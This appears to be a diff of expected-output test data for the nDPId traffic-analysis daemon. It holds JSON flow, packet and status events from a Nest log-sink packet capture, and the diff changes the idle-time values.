+00710{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1536712992228,"flow_last_seen":1536714607385,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"NestLogSink.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1536714602612,"flow_last_seen":1536714607322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":14831,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1536714610253,"flow_last_seen":1536714615546,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":276,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":276,"packets-processed":215,"total-skipped-flows":0,"total-l4-data-len":21968,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":5,"total-detection-updates":1,"total-updates":0,"current-active-flows":2,"total-active-flows":5,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1536714800447} 
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":278,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536714602587,"flow_last_seen":1536714607527,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1536714795433,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":326,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":326,"packets-processed":245,"total-skipped-flows":0,"total-l4-data-len":21968,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":5,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":37,"global_ts_msec":1536715402175} 
@@ -41,25 +41,25 @@ 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402804,"flow_last_seen":1536716402804,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536716402804,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1536716402805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1536716402805,"pkt":"GLQwJjRAAJD7JidrCABFAABUcEtAAEARZOvAqPIBwKjyDwA1znEAQGW0d92BgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536716402804,"flow_last_seen":1536716402805,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536716402805,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402828,"flow_last_seen":1536716402828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716402828,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1536716402828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716402828,"pkt":"AJD7JidrGLQwJjRACABFAAAsL\/gAAP8GGqXAqPIPI7yauvdxK1cI4Q21AAAAAGACEgDczAAAAgQEgAAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1536716402889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716402889,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93El8kNOCOENtmASbvAVfwAAAgQFjA=="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1536716402894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716402894,"pkt":"AJD7JidrGLQwJjRACABFAAAoL\/kAAP8GGqjAqPIPI7yauvdxK1cI4Q22JfJDT1AQEgCKBAAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716402828,"flow_last_seen":1536716404974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716404974,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402828,"flow_last_seen":1536716402828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716402828,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1536716402828,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716402828,"pkt":"AJD7JidrGLQwJjRACABFAAAsL\/gAAP8GGqXAqPIPI7yauvdxK1cI4Q21AAAAAGACEgDczAAAAgQEgAAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1536716402889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716402889,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93El8kNOCOENtmASbvAVfwAAAgQFjA=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1536716402894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716402894,"pkt":"AJD7JidrGLQwJjRACABFAAAoL\/kAAP8GGqjAqPIPI7yauvdxK1cI4Q22JfJDT1AQEgCKBAAAAAAAAAAA"} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716402828,"flow_last_seen":1536716404974,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716404974,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1536716407003,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1536716407003,"pkt":"AJD7JidrGLQwJjRACABFAABXMB8AAP8RJhTAqPIPwKjyAc5xADUAQ16pMiMBAAABAAAAAAAAB2N6ZmUxMDUHZnJvbnQwMQVpYWQwMQpwcm9kdWN0aW9uBG5lc3QDY29tAAABAAE="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716407119,"flow_last_seen":1536716407119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716407119,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1536716407119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716407119,"pkt":"AJD7JidrGLQwJjRACABFAAAsMCAAAP8GYljAqPIPI65S7fdyK1cI7G5zAAAAAGACEgDD3QAAAgQEgAAA"} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1536716407186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716407186,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93Kf6ho7COxudGASaQOxbwAAAgQFtA=="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1536716407188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716407188,"pkt":"AJD7JidrGLQwJjRACABFAAAoMCEAAP8GYlvAqPIPI65S7fdyK1cI7G50n+oaPFAQEgAgMAAAAAAAAAAA"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716407119,"flow_last_seen":1536716409280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716409280,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
-00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716409847,"flow_last_seen":1536716409847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716409847,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1536716409847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716409847,"pkt":"AJD7JidrGLQwJjRACABFAAAsMCwAAP8GGnHAqPIPI7yauvdzK1cI9889AAAAAGACEgAbLAAAAgQEgAAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1536716409908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716409908,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93M4S\/jECPfPPmASbvCMDgAAAgQFjA=="} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1536716409910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716409910,"pkt":"AJD7JidrGLQwJjRACABFAAAoMC0AAP8GGnTAqPIPI7yauvdzK1cI988+OEv4xVAQEgAAlAAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716409847,"flow_last_seen":1536716411997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716411997,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1536714607530,"flow_last_seen":1536716407068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":4069,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
-00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1536716402828,"flow_last_seen":1536716406969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":14853,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536716409847,"flow_last_seen":1536716412657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2259,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
+00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716407119,"flow_last_seen":1536716407119,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716407119,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1536716407119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716407119,"pkt":"AJD7JidrGLQwJjRACABFAAAsMCAAAP8GYljAqPIPI65S7fdyK1cI7G5zAAAAAGACEgDD3QAAAgQEgAAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1536716407186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716407186,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93Kf6ho7COxudGASaQOxbwAAAgQFtA=="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1536716407188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716407188,"pkt":"AJD7JidrGLQwJjRACABFAAAoMCEAAP8GYlvAqPIPI65S7fdyK1cI7G50n+oaPFAQEgAgMAAAAAAAAAAA"} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716407119,"flow_last_seen":1536716409280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716409280,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716409847,"flow_last_seen":1536716409847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716409847,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1536716409847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716409847,"pkt":"AJD7JidrGLQwJjRACABFAAAsMCwAAP8GGnHAqPIPI7yauvdzK1cI9889AAAAAGACEgAbLAAAAgQEgAAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1536716409908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716409908,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93M4S\/jECPfPPmASbvCMDgAAAgQFjA=="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1536716409910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716409910,"pkt":"AJD7JidrGLQwJjRACABFAAAoMC0AAP8GGnTAqPIPI7yauvdzK1cI988+OEv4xVAQEgAAlAAAAAAAAAAA"} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716409847,"flow_last_seen":1536716411997,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716411997,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1536714607530,"flow_last_seen":1536716407068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":4069,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1536716402828,"flow_last_seen":1536716406969,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":14853,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
